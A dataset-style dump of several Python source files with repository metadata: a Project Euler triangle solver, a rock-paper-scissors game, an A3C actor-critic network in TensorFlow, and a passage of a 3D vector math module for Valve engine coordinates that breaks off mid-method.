text stringlengths 0 1.05M | meta dict |
|---|---|
# a^2 + b^2 = c^2
# a + b + c = p(erimeter)
# c = p-a-b
# a^2 + b^2 = (p-a-b)^2
# b = p(p-2a) / 2(p-a)
def checkValidTri(a,b,c):
if (a**2 + b**2) == c**2:
return True
else: return False
def checkValidAns(a,b,c,p):
if (a+b+c)==p:
return True
else: return False
def getC(a,b):
return (a**2+b**2)**0.5
def genTri(p):
sides = []
for i in xrange(p):
i = float(i)
s = (p*(p-(2.*i))) / (2.*(p-i))
if s.is_integer() and s > 0:
sides.append(s)
return sides
def findTris(sides, p):
tris = []
for val in sides:
for valeile in sides:
if val is not valeile:
if chkVal(val, valeile, p):
tri = sorted([ val,valeile,getC(val,valeile) ])
if tri not in tris:
tris.append(tri)
return len(tris)
def chkVal(a,b,p):
c = (a**2+b**2)**0.5
if (a+b+c) == p:
return True
else: return False
def findMax(limit):
biggest = 0
biggestP = 0
for i in xrange(1, limit+1):
cur = findTris(genTri(i), i)
if cur > biggest:
biggest = cur
biggestP = i
return biggestP #, biggest
if __name__ == "__main__":
assert findTris(genTri(120), 120) == 3
print findMax(1000) # 840, 8 combinations
| {
"repo_name": "jamtot/PyProjectEuler",
"path": "39 - Integer right triangles/irt.py",
"copies": "1",
"size": "1392",
"license": "mit",
"hash": -2859073560607884000,
"line_mean": 22.2,
"line_max": 67,
"alpha_frac": 0.4640804598,
"autogenerated": false,
"ratio": 2.835030549898167,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.37991110096981673,
"avg_score": null,
"num_lines": null
} |
# A 2 player rock-paper-scissors game
# player a inputs one of three choices
# and then, second player does the same
# valid inputs for rock are 'r', 'rock', and 'sang' (in persian)
# also for paper we have 'p', 'paper', and 'kaghaz'
# and finally 's', 'scissors' and 'gheichi' could refer to scissors
#
# in fact, we allow players to type whatever they want,
# if they are lazy they would go for r p and s abbreviations
# and if they prefer full spell of words, we let them to choose
# among 'rock', 'paper' and ...
a = raw_input('Player A: ')
b = raw_input('Player B: ')
rock = ('rock', 'r', 'sang')
paper = ('paper', 'p', 'kaghaz')
scissors = ('scissors' , 's', 'gheichi')
if (a in rock and b in scissors) or \
(a in scissors and b in paper) or \
(a in paper and b in rock):
# So A wins:
print "Player A wins the game"
elif (b in rock and a in scissors) or \
(b in scissors and a in paper) or \
(b in paper and a in rock):
# In this case, B wins:
print "Player B wins the game"
# Now check for even:
elif (b in rock and a in rock) or \
(b in paper and a in paper) or \
(b in scissors and a in scissors):
print 'both players chose same thing'
else:
print 'Enter a valid input'
| {
"repo_name": "iamvee/Python-Course",
"path": "Topics/01.Conditions/RockPaper1.py",
"copies": "1",
"size": "1283",
"license": "mit",
"hash": -4291881526591991300,
"line_mean": 30.8974358974,
"line_max": 67,
"alpha_frac": 0.6196414653,
"autogenerated": false,
"ratio": 2.935926773455378,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.40555682387553776,
"avg_score": null,
"num_lines": null
} |
# A3C -- in progress!
from network import *
class PolicyVNetwork(Network):
def __init__(self, conf):
""" Set up remaining layers, objective and loss functions, gradient
compute and apply ops, network parameter synchronization ops, and
summary ops. """
super(PolicyVNetwork, self).__init__(conf)
self.entropy_regularisation_strength = \
conf['args'].entropy_regularisation_strength
# Toggle additional recurrent layer
recurrent_layer = False
with tf.name_scope(self.name):
self.critic_target_ph = tf.placeholder(
"float32", [None], name = 'target')
self.adv_actor_ph = tf.placeholder("float", [None], name = 'advantage')
# LSTM layer with 256 cells
# f = sigmoid(Wf * [h-, x] + bf)
# i = sigmoid(Wi * [h-, x] + bi)
# C' = sigmoid(Wc * [h-, x] + bc)
# o = sigmoid(Wo * [h-, x] + bo)
# C = f * C_ + i x C'
# h = o * tan C
# state = C
# o4 = x
if recurrent_layer:
layer_name = 'lstm_layer' ; hiddens = 256 ; dim = 256
with tf.variable_scope(self.name+'/'+layer_name) as vs:
self.lstm_cell = tf.nn.rnn_cell.LSTMCell(hiddens, dim)
self.lstm_cell_state = tf.Variable(
tf.zeros([1, self.lstm_cell.state_size]))
self.ox, self.lstm_cell_state = self.lstm_cell(
self.o3, self.lstm_cell_state)
# Get all LSTM trainable params
self.lstm_trainable_variables = [v for v in
tf.trainable_variables() if v.name.startswith(vs.name)]
else:
if self.arch == "NIPS":
self.ox = self.o3
else: #NATURE
self.ox = self.o4
# Final actor layer
layer_name = 'softmax_policy4'
self.wpi, self.bpi, self.output_layer_pi = self._softmax(
layer_name, self.ox, self.num_actions)
# Avoiding log(0) by adding a very small quantity (1e-30) to output.
self.log_output_layer_pi = tf.log(tf.add(self.output_layer_pi,
tf.constant(1e-30)), name= layer_name + '_log_policy')
# Entropy: sum_a (-p_a ln p_a)
self.output_layer_entropy = tf.reduce_sum(tf.mul(
tf.constant(-1.0),
tf.mul(self.output_layer_pi, self.log_output_layer_pi)), reduction_indices = 1)
# Final critic layer
self.wv, self.bv, self.output_layer_v = self._fc(
'fc_value4', self.ox, 1, activation = "linear")
if self.arch == "NIPS":
self.params = [self.w1, self.b1, self.w2, self.b2, self.w3,
self.b3, self.wpi, self.bpi, self.wv, self.bv]
else: #NATURE
self.params = [self.w1, self.b1, self.w2, self.b2, self.w3,
self.b3, self.w4, self.b4, self.wpi, self.bpi, self.wv, self.bv]
if recurrent_layer:
self.params += self.lstm_trainable_variables
# Advantage critic
self.adv_critic = tf.sub(self.critic_target_ph, tf.reshape(self.output_layer_v, [-1]))
# Actor objective
# Multiply the output of the network by a one hot vector, 1 for the
# executed action. This will make the non-regularised objective
# term for non-selected actions to be zero.
log_output_selected_action = tf.reduce_sum(
tf.mul(self.log_output_layer_pi, self.selected_action_ph),
reduction_indices = 1)
actor_objective_advantage_term = tf.mul(
log_output_selected_action, self.adv_actor_ph)
actor_objective_entropy_term = tf.mul(
self.entropy_regularisation_strength, self.output_layer_entropy)
self.actor_objective = tf.reduce_sum(tf.mul(
tf.constant(-1.0), tf.add(actor_objective_advantage_term,
actor_objective_entropy_term)))
# Critic loss
if self.clip_loss_delta > 0:
quadratic_part = tf.minimum(tf.abs(self.adv_critic),
tf.constant(self.clip_loss_delta))
linear_part = tf.sub(tf.abs(self.adv_critic), quadratic_part)
#OBS! For the standard L2 loss, we should multiply by 0.5. However, the authors of the paper
# recommend multiplying the gradients of the V function by 0.5. Thus the 0.5
self.critic_loss = tf.mul(tf.constant(0.5), tf.nn.l2_loss(quadratic_part) + \
self.clip_loss_delta * linear_part)
else:
#OBS! For the standard L2 loss, we should multiply by 0.5. However, the authors of the paper
# recommend multiplying the gradients of the V function by 0.5. Thus the 0.5
self.critic_loss = tf.mul(tf.constant(0.5), tf.nn.l2_loss(self.adv_critic))
self.loss = self.actor_objective + self.critic_loss
# Optimizer
grads = tf.gradients(self.loss, self.params)
# This is not really an operation, but a list of gradient Tensors.
# When calling run() on it, the value of those Tensors
# (i.e., of the gradients) will be calculated
if self.clip_norm_type == 'ignore':
# Unclipped gradients
self.get_gradients = grads
elif self.clip_norm_type == 'global':
# Clip network grads by network norm
self.get_gradients = tf.clip_by_global_norm(
grads, self.clip_norm)[0]
elif self.clip_norm_type == 'local':
# Clip layer grads by layer norm
self.get_gradients = [tf.clip_by_norm(
g, self.clip_norm) for g in grads]
# Placeholders for shared memory vars
self.params_ph = []
for p in self.params:
self.params_ph.append(tf.placeholder(tf.float32,
shape=p.get_shape(),
name="shared_memory_for_{}".format(
(p.name.split("/", 1)[1]).replace(":", "_"))))
# Ops to sync net with shared memory vars
self.sync_with_shared_memory = []
for i in xrange(len(self.params)):
self.sync_with_shared_memory.append(
self.params[i].assign(self.params_ph[i]))
| {
"repo_name": "traai/async-deep-rl",
"path": "algorithms/policy_v_network.py",
"copies": "1",
"size": "6869",
"license": "apache-2.0",
"hash": -4119399797232279600,
"line_mean": 45.7278911565,
"line_max": 108,
"alpha_frac": 0.5147765322,
"autogenerated": false,
"ratio": 3.88737973967176,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.49021562718717604,
"avg_score": null,
"num_lines": null
} |
"""A 3D vector class which matches Valve conventions.
>>> Vec(1, 2, 3)
Vec(1, 2, 3)
>>> Vec(1, 2, 3) * 2
Vec(2, 4, 6)
>>> Vec.from_str('<4 2 -45>')
Vec(4, 2, -45)
Vectors support arithmetic with scalars, applying the operation to the three
components.
Call Vec.as_tuple() to get a tuple-version of the vector, useful as a
dictionary key. Vec will treat 3-tuples as equivalent to itself, converting it
when used in math operations and comparing values.
Index via .x, .y, .z attributes, or 'x', 'y', 'z', 0, 1, 2 index access.
Rotations are represented by Euler angles, but modifications need to be
performed using matrices.
Rotations are implemented as a matrix-multiplication, where the left is rotated
by the right. Vectors can be rotated by matrices and angles and matrices
can be rotated by angles, but not vice-versa.
Scales magnitude:
- Vec * Scalar
- Scalar * Vec
- Angle * Scalar
- Scalar * Angle
Rotates LHS by RHS:
- Vec @ Angle
- Vec @ Matrix
- Angle @ Angle
- Angle @ Matrix
- Matrix @ Matrix
"""
import math
import contextlib
import warnings
from typing import (
Union, Tuple, overload, Type,
Dict, NamedTuple,
Iterator, Iterable, SupportsRound, Optional, TYPE_CHECKING,
)
__all__ = [
'parse_vec_str', 'to_matrix', 'lerp',
'Vec', 'Vec_tuple',
'Angle', 'Matrix',
]
# Type aliases
Tuple3 = Tuple[float, float, float]
AnyVec = Union['Vec', 'Vec_tuple', Tuple3]
def lerp(x: float, in_min: float, in_max: float, out_min: float, out_max: float) -> float:
"""Linearly interpolate from in to out.
If both in values are the same, ZeroDivisionError is raised.
"""
return out_min + ((x - in_min) * (out_max - out_min)) / (in_max - in_min)
def parse_vec_str(val: Union[str, 'Vec', 'Angle'], x=0.0, y=0.0, z=0.0) -> Tuple3:
"""Convert a string in the form '(4 6 -4)' into a set of floats.
If the string is unparsable, this uses the defaults (x,y,z).
The string can start with any of the (), {}, [], <> bracket
types.
If the 'string' is actually a Vec, the values will be returned.
"""
if isinstance(val, str):
pass # Fast path to skip the below code.
elif isinstance(val, Py_Vec):
return val.x, val.y, val.z
elif isinstance(val, Py_Angle):
return val.pitch, val.yaw, val.roll
else:
# Not a string.
return x, y, z
val = val.strip()
if val and val[0] in '({[<':
val = val[1:]
if val and val[-1] in ')}]>':
val = val[:-1]
try:
str_x, str_y, str_z = val.split()
except ValueError:
return x, y, z
try:
return (
float(str_x),
float(str_y),
float(str_z),
)
except ValueError:
return x, y, z
def to_matrix(value: Union['Angle', 'Matrix', 'Vec', Tuple3, None]) -> 'Matrix':
"""Convert various values to a rotation matrix.
Vectors will be treated as angles, and None as the identity.
"""
if value is None:
return Py_Matrix()
elif isinstance(value, Matrix):
return value
elif isinstance(value, Angle):
return Matrix.from_angle(value)
else:
[p, y, r] = value
return Matrix.from_angle(Angle(p, y, r))
class Vec_tuple(NamedTuple):
"""An immutable tuple, useful for dictionary keys."""
x: float
y: float
z: float
# Use template code to reduce duplication in the various magic number methods.
_VEC_ADDSUB_TEMP = '''
def __{func}__(self, other: Union['Vec', tuple, float]):
"""{op} operation.
This additionally works on scalars (adds to all axes).
"""
if isinstance(other, Py_Vec):
return Py_Vec(
self.x {op} other.x,
self.y {op} other.y,
self.z {op} other.z,
)
try:
if isinstance(other, tuple):
x = self.x {op} other[0]
y = self.y {op} other[1]
z = self.z {op} other[2]
else:
x = self.x {op} other
y = self.y {op} other
z = self.z {op} other
except TypeError:
return NotImplemented
else:
return Py_Vec(x, y, z)
def __r{func}__(self, other: Union['Vec', tuple, float]):
"""{op} operation with reversed operands.
This additionally works on scalars (adds to all axes).
"""
if isinstance(other, Py_Vec):
return Py_Vec(
other.x {op} self.x,
other.y {op} self.y,
other.z {op} self.z,
)
try:
if isinstance(other, tuple):
x = other[0] {op} self.x
y = other[1] {op} self.y
z = other[2] {op} self.z
else:
x = other {op} self.x
y = other {op} self.y
z = other {op} self.z
except TypeError:
return NotImplemented
else:
return Py_Vec(x, y, z)
def __i{func}__(self, other: Union['Vec', tuple, float]):
"""{op}= operation.
Like the normal one except without duplication.
"""
if isinstance(other, Py_Vec):
self.x {op}= other.x
self.y {op}= other.y
self.z {op}= other.z
elif isinstance(other, tuple):
self.x {op}= other[0]
self.y {op}= other[1]
self.z {op}= other[2]
elif isinstance(other, (int, float)):
orig = self.x, self.y, self.z
self.x {op}= other
self.y {op}= other
self.z {op}= other
else:
return NotImplemented
return self
'''
# Multiplication and division doesn't work with two vectors - use dot/cross
# instead.
_VEC_MULDIV_TEMP = '''
def __{func}__(self, other: float):
"""Vector {op} scalar operation."""
if isinstance(other, Py_Vec):
raise TypeError("Cannot {pretty} 2 Vectors.")
else:
try:
return Py_Vec(
self.x {op} other,
self.y {op} other,
self.z {op} other,
)
except TypeError:
return NotImplemented
def __r{func}__(self, other: float):
"""scalar {op} Vector operation."""
if isinstance(other, Py_Vec):
raise TypeError("Cannot {pretty} 2 Vectors.")
else:
try:
return Py_Vec(
other {op} self.x,
other {op} self.y,
other {op} self.z,
)
except TypeError:
return NotImplemented
def __i{func}__(self, other: float):
"""{op}= operation.
Like the normal one except without duplication.
"""
if isinstance(other, Py_Vec):
raise TypeError("Cannot {pretty} 2 Vectors.")
else:
self.x {op}= other
self.y {op}= other
self.z {op}= other
return self
'''
# Subclassing this causes isinstance() to become very slow, trying to check
# for __round__ on everything. So at runtime swap it out so it doesn't inherit.
globals()['SupportsRound'] = {'Vec': object}
class Vec(SupportsRound['Vec']):
"""A 3D Vector. This has most standard Vector functions.
Many of the functions will accept a 3-tuple for comparison purposes.
"""
__slots__ = ('x', 'y', 'z')
# Make type checkers understand that you can't do str->str or tuple->tuple.
INV_AXIS: Union[Dict[str, Tuple[str, str]], Dict[Tuple[str, str], str]] = {
'x': ('y', 'z'),
'y': ('x', 'z'),
'z': ('x', 'y'),
('y', 'z'): 'x',
('x', 'z'): 'y',
('x', 'y'): 'z',
('z', 'y'): 'x',
('z', 'x'): 'y',
('y', 'x'): 'z',
}
# Vectors pointing in all cardinal directions
N = north = y_pos = Vec_tuple(0, 1, 0)
S = south = y_neg = Vec_tuple(0, -1, 0)
E = east = x_pos = Vec_tuple(1, 0, 0)
W = west = x_neg = Vec_tuple(-1, 0, 0)
T = top = z_pos = Vec_tuple(0, 0, 1)
B = bottom = z_neg = Vec_tuple(0, 0, -1)
def __init__(
self,
x: Union[int, float, 'Vec', Iterable[float]]=0.0,
y: float=0.0,
z: float=0.0,
) -> None:
"""Create a Vector.
All values are converted to Floats automatically.
If no value is given, that axis will be set to 0.
An iterable can be passed in (as the x argument), which will be
used for x, y, and z.
"""
if isinstance(x, (int, float)):
self.x = float(x)
self.y = float(y)
self.z = float(z)
elif isinstance(x, Py_Vec):
self.x = x.x
self.y = x.y
self.z = x.z
else:
it = iter(x)
self.x = float(next(it, 0.0))
self.y = float(next(it, y))
self.z = float(next(it, z))
def copy(self) -> 'Vec':
"""Create a duplicate of this vector."""
return Py_Vec(self.x, self.y, self.z)
__copy__ = copy # copy module support.
def __reduce__(self) -> tuple:
"""Pickling support.
This redirects to a global function, so C/Python versions
interoperate.
"""
return _mk_vec, (self.x, self.y, self.z)
@classmethod
def from_str(cls, val: Union[str, 'Vec'], x: float=0.0, y: float=0.0, z: float=0.0) -> 'Vec':
"""Convert a string in the form '(4 6 -4)' into a Vector.
If the string is unparsable, this uses the defaults (x,y,z).
The string can start with any of the (), {}, [], <> bracket
types, or none.
If the value is already a vector, a copy will be returned.
"""
x, y, z = Py_parse_vec_str(val, x, y, z)
return cls(x, y, z)
@classmethod
@overload
def with_axes(cls, axis1: str, val1: Union[float, 'Vec']) -> 'Vec': ...
@classmethod
@overload
def with_axes(
cls,
axis1: str, val1: Union[float, 'Vec'],
axis2: str, val2: Union[float, 'Vec'],
) -> 'Vec': ...
@classmethod
@overload
def with_axes(
cls,
axis1: str, val1: Union[float, 'Vec'],
axis2: str, val2: Union[float, 'Vec'],
axis3: str, val3: Union[float, 'Vec'],
) -> 'Vec': ...
@classmethod
def with_axes(
cls,
axis1: str,
val1: Union[float, 'Vec'],
axis2: str=None,
val2: Union[float, 'Vec']=0.0,
axis3: str=None,
val3: Union[float, 'Vec']=0.0,
) -> 'Vec':
"""Create a Vector, given a number of axes and corresponding values.
This is a convenience for doing the following:
vec = Vec()
vec[axis1] = val1
vec[axis2] = val2
vec[axis3] = val3
The magnitudes can also be Vectors, in which case the matching
axis will be used from the vector.
"""
vec = cls()
vec[axis1] = val1[axis1] if isinstance(val1, Py_Vec) else val1
if axis2 is not None:
vec[axis2] = val2[axis2] if isinstance(val2, Py_Vec) else val2
if axis3 is not None:
vec[axis3] = val3[axis3] if isinstance(val3, Py_Vec) else val3
return vec
def rotate(
self,
pitch: float=0.0,
yaw: float=0.0,
roll: float=0.0,
round_vals: bool=True,
) -> 'Vec':
"""Rotate a vector by a Source rotational angle.
Returns the vector, so you can use it in the form
val = Vec(0,1,0).rotate(p, y, r)
If round is True, all values will be rounded to 6 decimals
(since these calculations always have small inprecision.)
"""
warnings.warn("Use vec @ Angle() instead.", DeprecationWarning, stacklevel=2)
mat = Py_Matrix.from_angle(Py_Angle(pitch, yaw, roll))
mat._vec_rot(self)
if round_vals:
self.x = round(self.x, 6)
self.y = round(self.y, 6)
self.z = round(self.z, 6)
return self
def rotate_by_str(self, ang: str, pitch=0.0, yaw=0.0, roll=0.0, round_vals=True) -> 'Vec':
"""Rotate a vector, using a string instead of a vector.
If the string cannot be parsed, use the passed in values instead.
"""
warnings.warn("Use vec @ Angle.from_str() instead.", DeprecationWarning, stacklevel=2)
mat = Py_Matrix.from_angle(Py_Angle.from_str(ang, pitch, yaw, roll))
mat._vec_rot(self)
if round_vals:
self.x = round(self.x, 6)
self.y = round(self.y, 6)
self.z = round(self.z, 6)
return self
@staticmethod
@overload
def bbox(__point: Iterable['Vec']) -> Tuple['Vec', 'Vec']: ...
@staticmethod
@overload
def bbox(*points: 'Vec') -> Tuple['Vec', 'Vec']: ...
@staticmethod
def bbox(*points: Union[Iterable['Vec'], 'Vec']) -> Tuple['Vec', 'Vec']:
"""Compute the bounding box for a set of points.
Pass either several Vecs, or an iterable of Vecs.
Returns a (min, max) tuple.
"""
# Allow passing a single iterable, but also handle a single Vec.
# The error messages match those produced by min()/max().
first: Vec
point_coll: Iterable[Vec]
if len(points) == 1 and not isinstance(points[0], Py_Vec):
try:
[[first, *point_coll]] = points # type: ignore # len() can't narrow
except ValueError:
raise ValueError('Vec.bbox() arg is an empty sequence') from None
else:
try:
first, *point_coll = points # type: ignore # len() can't narrow
except ValueError:
raise TypeError(
'Vec.bbox() expected at '
'least 1 argument, got 0.'
) from None
bbox_min = Py_Vec(first)
bbox_max = bbox_min.copy()
for point in point_coll:
bbox_min.min(point)
bbox_max.max(point)
return bbox_min, bbox_max
@classmethod
def iter_grid(
cls,
min_pos: 'Vec',
max_pos: 'Vec',
stride: int=1,
) -> Iterator['Vec']:
"""Loop over points in a bounding box. All coordinates should be integers.
Both borders will be included.
"""
min_x = int(min_pos.x)
min_y = int(min_pos.y)
min_z = int(min_pos.z)
max_x = int(max_pos.x)
max_y = int(max_pos.y)
max_z = int(max_pos.z)
for x in range(min_x, max_x + 1, stride):
for y in range(min_y, max_y + 1, stride):
for z in range(min_z, max_z + 1, stride):
yield cls(x, y, z)
def iter_line(self, end: 'Vec', stride: int=1) -> Iterator['Vec']:
"""Yield points between this point and 'end' (including both endpoints).
Stride specifies the distance between each point.
If the distance is less than the stride, only end-points will be yielded.
If they are the same, that point will be yielded.
"""
offset = end - self
length = offset.mag()
if length < stride:
# Not enough room, yield both
yield self.copy()
if self != end:
yield end.copy()
return
direction = offset.norm()
for pos in range(0, int(length), int(stride)):
yield self + direction * pos
yield end.copy() # Directly yield - ensures no rounding errors.
def axis(self) -> str:
"""For a normal vector, return the axis it is on."""
x = abs(self.x) > 1e-6
y = abs(self.y) > 1e-6
z = abs(self.z) > 1e-6
if x and not y and not z:
return 'x'
if not x and y and not z:
return 'y'
if not x and not y and z:
return 'z'
raise ValueError(
f'({self.x:g}, {self.y:g}, {self.z:g}) is '
f'not an on-axis vector!'
)
def to_angle(self, roll: float=0) -> 'Angle':
"""Convert a normal to a Source Engine angle.
A +x axis vector will result in a 0, 0, 0 angle. The roll is not
affected by the direction of the normal.
The inverse of this is `Vec(x=1) @ Angle(pitch, yaw, roll)`.
"""
# Pitch is applied first, so we need to reconstruct the x-value
horiz_dist = math.hypot(self.x, self.y)
return Py_Angle(
math.degrees(math.atan2(-self.z, horiz_dist)),
math.degrees(math.atan2(self.y, self.x)) % 360,
roll,
)
def to_angle_roll(self, z_norm: 'Vec', stride: int=0) -> 'Angle':
"""Produce a Source Engine angle with roll.
The z_normal should point in +z, and must be at right angles to this
vector.
This is deprecated, use Matrix.from_basis().to_angle().
Stride is no longer used.
"""
warnings.warn('Use Matrix.from_basis().to_angle()', DeprecationWarning)
return Py_Matrix.from_basis(x=self, z=z_norm).to_angle()
def rotation_around(self, rot: float=90) -> 'Angle':
"""For an axis-aligned normal, return the angles which rotate around it."""
warnings.warn('Use Matrix.axis_angle().to_angle()', DeprecationWarning)
if self.x and not self.y and not self.z:
return Py_Angle(roll=math.copysign(rot, self.x))
elif self.y and not self.x and not self.z:
return Py_Angle(pitch=math.copysign(rot, self.y))
elif self.z and not self.x and not self.y:
return Py_Angle(yaw=math.copysign(rot, self.z))
else:
raise ValueError('Zero vector!')
def __abs__(self) -> 'Vec':
"""Performing abs() on a Vec takes the absolute value of all axes."""
return Py_Vec(
abs(self.x),
abs(self.y),
abs(self.z),
)
# The numeric magic methods are defined via exec(), so we need stubs
# to annotate them in a way a type-checker can understand.
# These are immediately overwritten.
def __add__(self, other: Union['Vec', Tuple3, int, float]) -> 'Vec': ...
def __radd__(self, other: Union['Vec', Tuple3, int, float]) -> 'Vec': ...
def __iadd__(self, other: Union['Vec', Tuple3, int, float]) -> 'Vec': ...
def __sub__(self, other: Union['Vec', Tuple3, int, float]) -> 'Vec': ...
def __rsub__(self, other: Union['Vec', Tuple3, int, float]) -> 'Vec': ...
def __isub__(self, other: Union['Vec', Tuple3, int, float]) -> 'Vec': ...
def __mul__(self, other: float) -> 'Vec': ...
def __rmul__(self, other: float) -> 'Vec': ...
def __imul__(self, other: float) -> 'Vec': ...
def __truediv__(self, other: float) -> 'Vec': ...
def __rtruediv__(self, other: float) -> 'Vec': ...
def __itruediv__(self, other: float) -> 'Vec': ...
def __floordiv__(self, other: float) -> 'Vec': ...
def __rfloordiv__(self, other: float) -> 'Vec': ...
def __ifloordiv__(self, other: float) -> 'Vec': ...
def __mod__(self, other: float) -> 'Vec': ...
def __rmod__(self, other: float) -> 'Vec': ...
def __imod__(self, other: float) -> 'Vec': ...
funcname = op = pretty = None
# Use exec() to generate all the number magic methods. This reduces code
# duplication since they're all very similar.
for funcname, op in (('add', '+'), ('sub', '-')):
exec(
_VEC_ADDSUB_TEMP.format(func=funcname, op=op),
globals(),
locals(),
)
for funcname, op, pretty in (
('mul', '*', 'multiply'),
('truediv', '/', 'divide'),
('floordiv', '//', 'floor-divide'),
('mod', '%', 'modulus'),
):
exec(
_VEC_MULDIV_TEMP.format(func=funcname, op=op, pretty=pretty),
globals(),
locals(),
)
del funcname, op, pretty
# Divmod is entirely unique.
def __divmod__(self, other: float) -> Tuple['Vec', 'Vec']:
"""Divide the vector by a scalar, returning the result and remainder."""
if isinstance(other, Py_Vec):
raise TypeError("Cannot divide 2 Vectors.")
else:
try:
x1, x2 = divmod(self.x, other)
y1, y2 = divmod(self.y, other)
z1, z2 = divmod(self.z, other)
except TypeError:
return NotImplemented
else:
return Py_Vec(x1, y1, z1), Py_Vec(x2, y2, z2)
def __rdivmod__(self, other: float) -> Tuple['Vec', 'Vec']:
"""Divide a scalar by a vector, returning the result and remainder."""
try:
x1, x2 = divmod(other, self.x)
y1, y2 = divmod(other, self.y)
z1, z2 = divmod(other, self.z)
except (TypeError, ValueError):
return NotImplemented
else:
return Py_Vec(x1, y1, z1), Py_Vec(x2, y2, z2)
def __matmul__(self, other: Union['Angle', 'Matrix']) -> 'Vec':
"""Rotate this vector by an angle or matrix."""
if isinstance(other, Py_Matrix):
mat = other
elif isinstance(other, Py_Angle):
mat = Py_Matrix.from_angle(other)
else:
return NotImplemented
res = Vec(self.x, self.y, self.z)
mat._vec_rot(res)
return res
def __imatmul__(self, other: Union['Angle', 'Matrix']) -> 'Vec':
"""We need to define this, so it's in-place."""
if isinstance(other, Py_Matrix):
mat = other
elif isinstance(other, Py_Angle):
mat = Py_Matrix.from_angle(other)
else:
return NotImplemented
mat._vec_rot(self)
return self
def __bool__(self) -> bool:
"""Vectors are True if any axis is non-zero."""
return self.x != 0 or self.y != 0 or self.z != 0
def __eq__(self, other: object) -> bool:
"""== test.
Two Vectors are compared based on the axes.
A Vector can be compared with a 3-tuple as if it was a Vector also.
A tolerance of 1e-6 is accounted for automatically.
"""
if isinstance(other, Py_Vec):
return (
abs(other.x - self.x) < 1e-6 and
abs(other.y - self.y) < 1e-6 and
abs(other.z - self.z) < 1e-6
)
elif isinstance(other, tuple) and len(other) == 3:
return (
abs(self.x - other[0]) < 1e-6 and
abs(self.y - other[1]) < 1e-6 and
abs(self.z - other[2]) < 1e-6
)
else:
return NotImplemented
def __ne__(self, other: object) -> bool:
"""!= test.
Two Vectors are compared based on the axes.
A Vector can be compared with a 3-tuple as if it was a Vector also.
A tolerance of 1e-6 is accounted for automatically.
"""
if isinstance(other, Py_Vec):
return (
abs(other.x - self.x) >= 1e-6 or
abs(other.y - self.y) >= 1e-6 or
abs(other.z - self.z) >= 1e-6
)
elif isinstance(other, tuple) and len(other) == 3:
return (
abs(self.x - other[0]) >= 1e-6 or
abs(self.y - other[1]) >= 1e-6 or
abs(self.z - other[2]) >= 1e-6
)
else:
return NotImplemented
def __lt__(self, other: AnyVec) -> bool:
"""A<B test.
Two Vectors are compared based on the axes.
A Vector can be compared with a 3-tuple as if it was a Vector also.
A tolerance of 1e-6 is accounted for automatically.
"""
if isinstance(other, Py_Vec):
return (
(other.x - self.x) > 1e-6 and
(other.y - self.y) > 1e-6 and
(other.z - self.z) > 1e-6
)
elif isinstance(other, tuple) and len(other) == 3:
return (
(other[0] - self.x) > 1e-6 and
(other[1] - self.y) > 1e-6 and
(other[2] - self.z) > 1e-6
)
else:
return NotImplemented
def __le__(self,other: AnyVec) -> bool:
"""A<=B test.
Two Vectors are compared based on the axes.
A Vector can be compared with a 3-tuple as if it was a Vector also.
A tolerance of 1e-6 is accounted for automatically.
"""
if isinstance(other, Py_Vec):
return (
(self.x - other.x) <= 1e-6 and
(self.y - other.y) <= 1e-6 and
(self.z - other.z) <= 1e-6
)
elif isinstance(other, tuple) and len(other) == 3:
return (
(self.x - other[0]) <= 1e-6 and
(self.y - other[1]) <= 1e-6 and
(self.z - other[2]) <= 1e-6
)
else:
return NotImplemented
def __gt__(self,other: AnyVec) -> bool:
"""A>B test.
Two Vectors are compared based on the axes.
A Vector can be compared with a 3-tuple as if it was a Vector also.
A tolerance of 1e-6 is accounted for automatically.
"""
if isinstance(other, Py_Vec):
return (
(self.x - other.x) > 1e-6 and
(self.y - other.y) > 1e-6 and
(self.z - other.z) > 1e-6
)
elif isinstance(other, tuple) and len(other) == 3:
return (
(self.x > other[0]) > 1e-6 and
(self.y > other[1]) > 1e-6 and
(self.z > other[2]) > 1e-6
)
else:
return NotImplemented
def __ge__(self, other: AnyVec) -> bool:
"""A>=B test.
Two Vectors are compared based on the axes.
A Vector can be compared with a 3-tuple as if it was a Vector also.
A tolerance of 1e-6 is accounted for automatically.
"""
if isinstance(other, Py_Vec):
return (
(other.x - self.x) <= 1e-6 and
(other.y - self.y) <= 1e-6 and
(other.z - self.z) <= 1e-6
)
elif isinstance(other, tuple) and len(other) == 3:
return (
(other[0] - self.x) <= 1e-6 and
(other[1] - self.y) <= 1e-6 and
(other[2] - self.z) <= 1e-6
)
else:
return NotImplemented
def max(self, other: AnyVec) -> None:
"""Set this vector's values to the maximum of the two vectors."""
if self.x < other[0]:
self.x = other[0]
if self.y < other[1]:
self.y = other[1]
if self.z < other[2]:
self.z = other[2]
def min(self, other: AnyVec) -> None:
"""Set this vector's values to be the minimum of the two vectors."""
if self.x > other[0]:
self.x = other[0]
if self.y > other[1]:
self.y = other[1]
if self.z > other[2]:
self.z = other[2]
def __round__(self, ndigits: int=0) -> 'Vec':
"""Performing round() on a Py_Vec rounds each axis."""
return Py_Vec(
round(self.x, ndigits),
round(self.y, ndigits),
round(self.z, ndigits),
)
def mag(self) -> float:
"""Compute the distance from the vector and the origin."""
return math.sqrt(self.x**2 + self.y**2 + self.z**2)
def join(self, delim: str=', ') -> str:
"""Return a string with all numbers joined by the passed delimiter.
This strips off the .0 if no decimal portion exists.
"""
# :g strips the .0 off of floats if it's an integer.
return f'{self.x:g}{delim}{self.y:g}{delim}{self.z:g}'
def __str__(self) -> str:
"""Return the values, separated by spaces.
This is the main format in Valve's file formats.
This strips off the .0 if no decimal portion exists.
"""
return f"{self.x:g} {self.y:g} {self.z:g}"
def __format__(self, format_spec: str) -> str:
"""Control how the text is formatted."""
if not format_spec:
format_spec = 'g'
return f"{self.x:{format_spec}} {self.y:{format_spec}} {self.z:{format_spec}}"
def __repr__(self) -> str:
"""Code required to reproduce this vector."""
return f"Vec({self.x:g}, {self.y:g}, {self.z:g})"
def __iter__(self) -> Iterator[float]:
"""Allow iterating through the dimensions."""
yield self.x
yield self.y
yield self.z
def __getitem__(self, ind: Union[str, int]) -> float:
"""Allow reading values by index instead of name if desired.
This accepts either 0,1,2 or 'x','y','z' to read values.
Useful in conjunction with a loop to apply commands to all values.
"""
if ind == 0 or ind == "x":
return self.x
elif ind == 1 or ind == "y":
return self.y
elif ind == 2 or ind == "z":
